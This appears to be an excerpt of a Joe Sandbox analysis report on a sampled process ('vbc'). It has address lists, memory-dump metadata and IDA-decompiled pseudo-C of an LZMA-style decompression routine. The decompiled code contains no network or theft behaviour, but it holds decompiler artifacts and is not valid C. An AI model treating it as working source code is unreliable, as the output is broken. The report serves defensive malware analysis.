0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00406fc2
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00000000
0x00406fc8
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00406f49
0x00406f46
0x00000000
0x00406c9b

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406BE3 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406BE3() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
